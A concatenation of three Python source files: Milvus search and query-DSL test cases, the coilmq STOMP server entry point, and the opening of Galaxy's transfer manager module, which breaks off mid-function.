milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
def search(milvus):
res = connect.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
t = threading.Thread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.level(2)
@pytest.mark.timeout(30)
def test_search_concurrent_multithreads_single_connection(self, connect, args):
'''
target: test concurrent search with multiprocessess
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(collection_id)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
def search(milvus):
res = connect.search(collection, default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
t = threading.Thread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.level(2)
def test_search_multi_collections(self, connect, args):
'''
target: test search multi collections of L2
method: add vectors into 10 collections, and search
expected: search status ok, the length of result
'''
num = 10
top_k = 10
nq = 20
for i in range(num):
collection = gen_unique_str(collection_id + str(i))
connect.create_collection(collection, default_fields)
entities, ids = init_data(connect, collection)
assert len(ids) == nb
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
res = connect.search(collection, query)
assert len(res) == nq
for i in range(nq):
assert check_id_result(res[i], ids[i])
assert res[i]._distances[0] < epsilon
assert res[i]._distances[1] > epsilon
class TestSearchDSL(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
def test_query_no_must(self, connect, collection):
'''
method: build query without must expr
expected: error raised
'''
# entities, ids = init_data(connect, collection)
query = update_query_expr(default_query, keep_old=False)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_no_vector_term_only(self, connect, collection):
'''
method: build query without vector only term
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_term_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_no_vector_range_only(self, connect, collection):
'''
method: build query without vector only range
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_range_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_vector_only(self, connect, collection):
entities, ids = init_data(connect, collection)
res = connect.search(collection, default_query)
assert len(res) == nq
assert len(res[0]) == top_k
def test_query_wrong_format(self, connect, collection):
'''
method: build query without must expr, with wrong expr name
expected: error raised
'''
# entities, ids = init_data(connect, collection)
expr = {
"must1": [gen_default_term_expr]
}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_empty(self, connect, collection):
'''
method: search with empty query
expected: error raised
'''
query = {}
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build valid query expr
******************************************************************
"""
@pytest.mark.level(2)
def test_query_term_value_not_in(self, connect, collection):
'''
method: build query with vector and term expr, with no term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[100000])]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO:
# TODO:
@pytest.mark.level(2)
def test_query_term_value_all_in(self, connect, collection):
'''
method: build query with vector and term expr, with all term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[1])]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 1
# TODO:
# TODO:
@pytest.mark.level(2)
def test_query_term_values_not_in(self, connect, collection):
'''
method: build query with vector and term expr, with no term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(values=[i for i in range(100000, 100010)])]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO:
def test_query_term_values_all_in(self, connect, collection):
'''
method: build query with vector and term expr, with all term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr()]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == top_k
# TODO:
def test_query_term_values_parts_in(self, connect, collection):
'''
method: build query with vector and term expr, with parts of term can be filtered
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(values=[i for i in range(nb // 2, nb + nb // 2)])]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == top_k
# TODO:
# TODO:
@pytest.mark.level(2)
def test_query_term_values_repeat(self, connect, collection):
'''
method: build query with vector and term expr, with the same values
expected: filter pass
'''
entities, ids = init_data(connect, collection)
expr = {
"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[1 for i in range(1, nb)])]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 1
# TODO:
def test_query_term_value_empty(self, connect, collection):
'''
method: build query with term value empty
expected: return null
'''
expr = {"must": [gen_default_vector_expr(default_query), gen_default_term_expr(values=[])]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
"""
******************************************************************
# The following cases are used to build invalid term query expr
******************************************************************
"""
# TODO
@pytest.mark.level(2)
def test_query_term_key_error(self, connect, collection):
'''
method: build query with term key error
expected: Exception raised
'''
expr = {"must": [gen_default_vector_expr(default_query),
gen_default_term_expr(keyword="terrm", values=[i for i in range(nb // 2)])]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.fixture(
scope="function",
params=gen_invalid_term()
)
def get_invalid_term(self, request):
return request.param
@pytest.mark.level(2)
def test_query_term_wrong_format(self, connect, collection, get_invalid_term):
'''
method: build query with wrong format term
expected: Exception raised
'''
entities, ids = init_data(connect, collection)
term = get_invalid_term
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
# TODO
@pytest.mark.level(2)
def test_query_term_field_named_term(self, connect, collection):
'''
method: build query with field named "term"
expected: error raised
'''
term_fields = add_field_default(default_fields, field_name="term")
collection_term = gen_unique_str("term")
connect.create_collection(collection_term, term_fields)
term_entities = add_field(entities, field_name="term")
ids = connect.insert(collection_term, term_entities)
assert len(ids) == nb
connect.flush([collection_term])
count = connect.count_entities(collection_term)
assert count == nb
term_param = {"term": {"term": {"values": [i for i in range(nb // 2)]}}}
expr = {"must": [gen_default_vector_expr(default_query),
term_param]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection_term, query)
assert len(res) == nq
assert len(res[0]) == top_k
connect.drop_collection(collection_term)
@pytest.mark.level(2)
def test_query_term_one_field_not_existed(self, connect, collection):
'''
method: build query with two fields term, one of it not existed
expected: exception raised
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
term["term"].update({"a": [0]})
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build valid range query expr
******************************************************************
"""
# TODO
def test_query_range_key_error(self, connect, collection):
'''
method: build query with range key error
expected: Exception raised
'''
range = gen_default_range_expr(keyword="ranges")
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.fixture(
scope="function",
params=gen_invalid_range()
)
def get_invalid_range(self, request):
return request.param
# TODO
@pytest.mark.level(2)
def test_query_range_wrong_format(self, connect, collection, get_invalid_range):
'''
method: build query with wrong format range
expected: Exception raised
'''
entities, ids = init_data(connect, collection)
range = get_invalid_range
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_range_string_ranges(self, connect, collection):
'''
method: build query with invalid ranges
expected: raise Exception
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": "0", "LT": "1000"}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_query_range_invalid_ranges(self, connect, collection):
'''
method: build query with invalid ranges
expected: 0
'''
entities, ids = init_data(connect, collection)
ranges = {"GT": nb, "LT": 0}
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res[0]) == 0
@pytest.fixture(
scope="function",
params=gen_valid_ranges()
)
def get_valid_ranges(self, request):
return request.param
@pytest.mark.level(2)
def test_query_range_valid_ranges(self, connect, collection, get_valid_ranges):
'''
method: build query with valid ranges
expected: pass
'''
entities, ids = init_data(connect, collection)
ranges = get_valid_ranges
range = gen_default_range_expr(ranges=ranges)
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == top_k
def test_query_range_one_field_not_existed(self, connect, collection):
'''
method: build query with two fields ranges, one of fields not existed
expected: exception raised
'''
entities, ids = init_data(connect, collection)
range = gen_default_range_expr()
range["range"].update({"a": {"GT": 1, "LT": nb // 2}})
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
************************************************************************
# The following cases are used to build query expr multi range and term
************************************************************************
"""
# TODO
@pytest.mark.level(2)
def test_query_multi_term_has_common(self, connect, collection):
'''
method: build query with multi term with same field, and values has common
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(values=[i for i in range(nb // 3)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == top_k
# TODO
@pytest.mark.level(2)
def test_query_multi_term_no_common(self, connect, collection):
'''
method: build query with multi range with same field, and ranges no common
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(values=[i for i in range(nb // 2, nb + nb // 2)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO
def test_query_multi_term_different_fields(self, connect, collection):
'''
method: build query with multi range with same field, and ranges no common
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = gen_default_term_expr()
term_second = gen_default_term_expr(field="float", values=[float(i) for i in range(nb // 2, nb)])
expr = {"must": [gen_default_vector_expr(default_query), term_first, term_second]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO
@pytest.mark.level(2)
def test_query_single_term_multi_fields(self, connect, collection):
'''
method: build query with multi term, different field each term
expected: pass
'''
entities, ids = init_data(connect, collection)
term_first = {"int64": {"values": [i for i in range(nb // 2)]}}
term_second = {"float": {"values": [float(i) for i in range(nb // 2, nb)]}}
term = update_term_expr({"term": {}}, [term_first, term_second])
expr = {"must": [gen_default_vector_expr(default_query), term]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
# TODO
@pytest.mark.level(2)
def test_query_multi_range_has_common(self, connect, collection):
'''
method: build query with multi range with same field, and ranges has common
expected: pass
'''
entities, ids = init_data(connect, collection)
range_one = gen_default_range_expr()
range_two = gen_default_range_expr(ranges={"GT": 1, "LT": nb // 3})
expr = {"must": [gen_default_vector_expr(default_query), range_one, range_two]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == top_k
# TODO
@pytest.mark.level(2)
def test_query_multi_range_no_common(self, connect, collection):
'''
method: build query with multi range with same field, and ranges no common
expected: pass
'''
entities, ids = init_data(connect, collection)
range_one = gen_default_range_expr()
range_two = gen_default_range_expr(ranges={"GT": nb // 2, "LT": nb})
expr = {"must": [gen_default_vector_expr(default_query), range_one, range_two]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO
@pytest.mark.level(2)
def test_query_multi_range_different_fields(self, connect, collection):
'''
method: build query with multi range, different field each range
expected: pass
'''
entities, ids = init_data(connect, collection)
range_first = gen_default_range_expr()
range_second = gen_default_range_expr(field="float", ranges={"GT": nb // 2, "LT": nb})
expr = {"must": [gen_default_vector_expr(default_query), range_first, range_second]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
# TODO
@pytest.mark.level(2)
def test_query_single_range_multi_fields(self, connect, collection):
'''
method: build query with multi range, different field each range
expected: pass
'''
entities, ids = init_data(connect, collection)
range_first = {"int64": {"GT": 0, "LT": nb // 2}}
range_second = {"float": {"GT": nb / 2, "LT": float(nb)}}
range = update_range_expr({"range": {}}, [range_first, range_second])
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build query expr both term and range
******************************************************************
"""
# TODO
@pytest.mark.level(2)
def test_query_single_term_range_has_common(self, connect, collection):
'''
method: build query with single term single range
expected: pass
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
range = gen_default_range_expr(ranges={"GT": -1, "LT": nb // 2})
expr = {"must": [gen_default_vector_expr(default_query), term, range]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == top_k
# TODO
def test_query_single_term_range_no_common(self, connect, collection):
'''
method: build query with single term single range
expected: pass
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
range = gen_default_range_expr(ranges={"GT": nb // 2, "LT": nb})
expr = {"must": [gen_default_vector_expr(default_query), term, range]}
query = update_query_expr(default_query, expr=expr)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
"""
******************************************************************
# The following cases are used to build multi vectors query expr
******************************************************************
"""
# TODO
def test_query_multi_vectors_same_field(self, connect, collection):
'''
method: build query with two vectors same field
expected: error raised
'''
entities, ids = init_data(connect, collection)
vector1 = default_query
vector2 = gen_query_vectors(field_name, entities, top_k, nq=2)
expr = {
"must": [vector1, vector2]
}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
class TestSearchDSLBools(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
@pytest.mark.level(2)
def test_query_no_bool(self, connect, collection):
'''
method: build query without bool expr
expected: error raised
'''
entities, ids = init_data(connect, collection)
expr = {"bool1": {}}
query = expr
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_should_only_term(self, connect, collection):
'''
method: build query without must, with should.term instead
expected: error raised
'''
expr = {"should": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_should_only_vector(self, connect, collection):
'''
method: build query without must, with should.vector instead
expected: error raised
'''
expr = {"should": default_query["bool"]["must"]}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_must_not_only_term(self, connect, collection):
'''
method: build query without must, with must_not.term instead
expected: error raised
'''
expr = {"must_not": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_must_not_vector(self, connect, collection):
'''
method: build query without must, with must_not.vector instead
expected: error raised
'''
expr = {"must_not": default_query["bool"]["must"]}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_query_must_should(self, connect, collection):
'''
method: build query must, and with should.term
expected: error raised
'''
expr = {"should": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=True, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to test `search` function
# with invalid collection_name, or invalid query expr
******************************************************************
"""
class TestSearchInvalid(object):
"""
Test search collection with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_tag(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.level(2)
def test_search_with_invalid_collection(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
res = connect.search(collection_name, default_query)
@pytest.mark.level(1)
def test_search_with_invalid_tag(self, connect, collection):
tag = " "
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, partition_tags=tag)
@pytest.mark.level(2)
def test_search_with_invalid_field_name(self, connect, collection, get_invalid_field):
fields = [get_invalid_field]
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, fields=fields)
@pytest.mark.level(1)
def test_search_with_not_existed_field_name(self, connect, collection):
fields = [gen_unique_str("field_name")]
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, fields=fields)
"""
Test search collection with invalid query
"""
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_top_k(self, request):
yield request.param
@pytest.mark.level(1)
def test_search_with_invalid_top_k(self, connect, collection, get_top_k):
'''
target: test search fuction, with the wrong top_k
method: search with top_k
expected: raise an error, and the connection is normal
'''
top_k = get_top_k
default_query["bool"]["must"][0]["vector"][field_name]["topk"] = top_k
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query)
"""
Test search collection with invalid search params
"""
@pytest.fixture(
scope="function",
params=gen_invaild_search_params()
)
def get_search_params(self, request):
yield request.param
@pytest.mark.level(2)
def test_search_with_invalid_params(self, connect, collection, get_simple_index, get_search_params):
'''
target: test search fuction, with the wrong nprobe
method: search with nprobe
expected: raise an error, and the connection is normal
'''
search_params = get_search_params
index_type = get_simple_index["index_type"]
if index_type in ["FLAT"]:
pytest.skip("skip in FLAT index")
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
query, vecs = gen_query_vectors(field_name, entities, top_k, 1, search_params=search_params["search_params"])
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_search_with_empty_params(self, connect, collection, args, get_simple_index):
'''
target: test search fuction, with empty search params
method: search with params
expected: raise an error, and the connection is normal
'''
index_type = get_simple_index["index_type"]
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
if index_type == "FLAT":
pytest.skip("skip in FLAT index")
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
query, vecs = gen_query_vectors(field_name, entities, top_k, 1, search_params={})
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def check_id_result(result, id):
limit_in = 5
ids = [entity.id for entity in result]
if len(result) >= limit_in:
return id in ids[:limit_in]
else:
return id in ids
|
start.py
|
#!python
"""
Entrypoint for starting the application.
"""
import os
import logging
import time
import threading
from contextlib import contextmanager
is_nt = os.name == 'nt'
if not is_nt:
import daemon as pydaemon
import pid
else:
pydaemon = pid = None
import click
from coilmq.config import config as global_config, init_config, init_logging, resolve_name
from coilmq.protocol import STOMP11
from coilmq.topic import TopicManager
from coilmq.queue import QueueManager
from coilmq.server.socket_server import ThreadedStompServer
__authors__ = ['"Hans Lellelid" <hans@xmpl.org>']
__copyright__ = "Copyright 2009 Hans Lellelid"
__license__ = """Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
logger = logging.getLogger(__name__)
def server_from_config(config=None, server_class=None, additional_kwargs=None):
"""
Gets a configured L{coilmq.server.StompServer} from specified config.
If `config` is None, global L{coilmq.config.config} var will be used instead.
The `server_class` and `additional_kwargs` are primarily hooks for using this method
from a testing environment.
@param config: A C{ConfigParser.ConfigParser} instance with loaded config values.
@type config: C{ConfigParser.ConfigParser}
@param server_class: Which class to use for the server. (This doesn't come from config currently.)
@type server_class: C{class}
@param additional_kwargs: Any additional args that should be passed to class.
@type additional_kwargs: C{list}
@return: The configured StompServer.
@rtype: L{coilmq.server.StompServer}
"""
global global_config
if not config:
config = global_config
queue_store_factory = resolve_name(config.get('coilmq', 'qstore.factory'))
subscriber_scheduler_factory = resolve_name(config.get(
'coilmq', 'scheduler.subscriber_priority_factory'))
queue_scheduler_factory = resolve_name(config.get(
'coilmq', 'scheduler.queue_priority_factory'))
if config.has_option('coilmq', 'auth.factory'):
authenticator_factory = resolve_name(
config.get('coilmq', 'auth.factory'))
authenticator = authenticator_factory()
else:
authenticator = None
server = ThreadedStompServer((config.get('coilmq', 'listen_addr'), config.getint('coilmq', 'listen_port')),
queue_manager=QueueManager(store=queue_store_factory(),
subscriber_scheduler=subscriber_scheduler_factory(),
queue_scheduler=queue_scheduler_factory()),
topic_manager=TopicManager(),
authenticator=authenticator,
protocol=STOMP11)
logger.info("Created server:%r" % server)
return server
def context_serve(context, configfile, listen_addr, listen_port, logfile,
debug, daemon, uid, gid, pidfile, umask, rundir):
"""
Takes a context object, which implements the __enter__/__exit__ "with" interface
and starts a server within that context.
This method is a refactored single-place for handling the server-run code whether
running in daemon or non-daemon mode. It is invoked with a dummy (passthrough)
context object for the non-daemon use case.
@param options: The compiled collection of options that need to be parsed.
@type options: C{ConfigParser}
@param context: The context object that implements __enter__/__exit__ "with" methods.
@type context: C{object}
@raise Exception: Any underlying exception will be logged but then re-raised.
@see: server_from_config()
"""
global global_config
server = None
try:
with context:
# There's a possibility here that init_logging() will throw an exception. If it does,
# AND we're in a daemon context, then we're not going to be able to do anything with it.
# We've got no stderr/stdout here; and so (to my knowledge) no reliable (& cross-platform),
# way to display errors.
level = logging.DEBUG if debug else logging.INFO
init_logging(logfile=logfile, loglevel=level,
configfile=configfile)
server = server_from_config()
logger.info("Stomp server listening on %s:%s" % server.server_address)
if debug:
poll_interval = float(global_config.get(
'coilmq', 'debug.stats_poll_interval'))
if poll_interval: # Setting poll_interval to 0 effectively disables it.
def diagnostic_loop(server):
log = logger
while True:
log.debug(
"Stats heartbeat -------------------------------")
store = server.queue_manager.store
for dest in store.destinations():
log.debug("Queue %s: size=%s, subscribers=%s" % (
dest, store.size(dest), server.queue_manager.subscriber_count(dest)))
# TODO: Add number of subscribers?
time.sleep(poll_interval)
diagnostic_thread = threading.Thread(
target=diagnostic_loop, name='DiagnosticThread', args=(server,))
diagnostic_thread.daemon = True
diagnostic_thread.start()
server.serve_forever()
except (KeyboardInterrupt, SystemExit):
logger.info("Stomp server stopped by user interrupt.")
raise SystemExit()
except Exception as e:
logger.error("Stomp server stopped due to error: %s" % e)
logger.exception(e)
raise SystemExit()
finally:
if server:
server.server_close()
def _main(config=None, host=None, port=None, logfile=None, debug=None,
daemon=None, uid=None, gid=None, pidfile=None, umask=None, rundir=None):
# Note that we must initialize the configuration before we enter the context
# block; however, we _cannot_ initialize logging until we are in the context block
# (so we defer that until the context_serve call.)
init_config(config)
if host is not None:
global_config.set('coilmq', 'listen_addr', host)
if port is not None:
global_config.set('coilmq', 'listen_port', str(port))
if daemon and is_nt:
warnings.warn("Daemon context is not available for NT platform")
# in an on-daemon mode, we use a dummy context objectx
# so we can use the same run-server code as the daemon version.
context = pydaemon.DaemonContext(uid=uid,
gid=gid,
pidfile=pid.PidFile(pidname=pidfile) if pidfile else None,
umask=int(umask, 8),
working_directory=rundir) if daemon and pydaemon else contextmanager(lambda: (yield))()
context_serve(context, config, host, port, logfile, debug, daemon, uid, gid, pidfile, umask, rundir)
@click.command()
@click.option("-c", "--config", help="Read configuration from FILE. (CLI options override config file.)", metavar="FILE")
@click.option("-b", "--host", help="Listen on specified address (default 127.0.0.1)", metavar="ADDR")
@click.option("-p", "--port", help="Listen on specified port (default 61613)", type=int, metavar="PORT")
@click.option("-l", "--logfile", help="Log to specified file (unless logging configured in config file).", metavar="FILE")
@click.option("--debug", default=False, help="Sets logging to debug (unless logging configured in config file).")
@click.option("-d", "--daemon", default=False, help="Run server as a daemon (default False).")
@click.option("-u", "--uid", help="The user/UID to use for daemon process.", metavar="UID")
@click.option("-g", "--gid", help="The group/GID to use for daemon process.", metavar="GID")
@click.option("--pidfile", help="The PID file to use.", metavar="FILE")
@click.option("--umask", help="Umask (octal) to apply for daemonized process.", metavar="MASK")
@click.option('--rundir', help="The working directory to use for the daemonized process (default /).", metavar="DIR")
def main(config, host, port, logfile, debug, daemon, uid, gid, pidfile, umask, rundir):
"""
Main entry point for running a socket server from the commandline.
This method will read in options from the commandline and call the L{config.init_config} method
to get everything setup. Then, depending on whether deamon mode was specified or not,
the process may be forked (or not) and the server will be started.
"""
_main(**locals())
if __name__ == '__main__':
try:
main()
except (KeyboardInterrupt, SystemExit):
pass
except Exception as e:
logger.error("Server terminated due to error: %s" % e)
logger.exception(e)
|
transfer_manager.py
|
"""
Manage transfers from arbitrary URLs to temporary files. Socket interface for
IPC with multiple process configurations.
"""
import json
import logging
import os
import socket
import subprocess
import threading
from six.moves import shlex_quote
from galaxy.util import listify, sleeper
from galaxy.util.json import jsonrpc_request, validate_jsonrpc_response
log = logging.getLogger(__name__)
class TransferManager(object):
"""
Manage simple data transfers from URLs to temporary locations.
"""
def __init__(self, app):
self.app = app
self.sa_session = app.model.context.current
self.command = ['python', os.path.abspath(os.path.join(os.getcwd(), 'scripts', 'transfer.py'))]
if app.config.get_bool('enable_job_recovery', True):
# Only one Galaxy server process should be able to recover jobs! (otherwise you'll have nasty race conditions)
self.running = True
self.sleeper = sleeper.Sleeper()
self.restarter = threading.Thread(target=self.__restarter)
self.restarter.start()
def new(self, path=None, **kwd):
if 'protocol' not in kwd:
raise Exception('Missing required parameter "protocol".')
protocol = kwd['protocol']
if protocol in ['http', 'https']:
if 'url' not in kwd:
raise Exception('Missing required parameter "url".')
elif protocol == 'scp':
# TODO: add more checks here?
if 'sample_dataset_id' not in kwd:
raise Exception('Missing required parameter "sample_dataset_id".')
if 'file_path' not in kwd:
raise Exception('Missing required parameter "file_path".')
transfer_job = self.app.model.TransferJob(state=self.app.model.TransferJob.states.NEW, params=kwd)
self.sa_session.add(transfer_job)
self.sa_session.flush()
return transfer_job
def run(self, transfer_jobs):
"""
This method blocks, so if invoking the transfer manager ever starts
taking too long, we should move it to a thread. However, the
transfer_manager will either daemonize or return after submitting to a
running daemon, so it should be fairly quick to return.
"""
transfer_jobs = listify(transfer_jobs)
printable_tj_ids = ', '.join([str(tj.id) for tj in transfer_jobs])
log.debug('Initiating transfer job(s): %s' % printable_tj_ids)
# Set all jobs running before spawning, or else updating the state may
# clobber a state change performed by the worker.
[tj.__setattr__('state', tj.states.RUNNING) for tj in transfer_jobs]
self.sa_session.add_all(transfer_jobs)
self.sa_session.flush()
for tj in transfer_jobs:
# The transfer script should daemonize fairly quickly - if this is
# not the case, this process will need to be moved to a
# non-blocking method.
cmd = self.command + [tj.id]
log.debug('Transfer command is: %s', ' '.join(map(shlex_quote, cmd)))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
p.wait()
output = p.stdout.read(32768)
if p.returncode != 0:
log.error('Spawning transfer job failed: %s: %s' % (tj.id, output))
tj.state = tj.states.ERROR
tj.info = 'Spawning transfer job failed: %s' % output.splitlines()[-1]
self.sa_session.add(tj)
self.sa_session.flush()
def get_state(self, transfer_jobs, via_socket=False):
transfer_jobs = listify(transfer_jobs)
rval = []
for tj in transfer_jobs:
if via_socket and tj.state not in tj.terminal_states and tj.socket:
try:
request = jsonrpc_request(method='get_state', id=True)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect(('localhost', tj.socket))
sock.send(json.dumps(request))
response = sock.recv(8192)
valid, response = validate_jsonrpc_response(response, id=request['id'])
if not valid:
# No valid response received, make some pseudo-json-rpc
raise Exception(dict(code=128, message='Did not receive valid response from transfer daemon for state'))
if 'error' in response:
# Response was valid but Request resulted in an error
raise Exception(response['error'])
else:
# Request was valid
response['result']['transfer_job_id'] = tj.id
rval.append(response['result'])
except Exception as e:
# State checking via the transfer daemon failed, just
# return the state from the database instead. Callers can
# look for the 'error' member of the response to see why
# the check failed.
self.sa_session.refresh(tj)
error = e.args
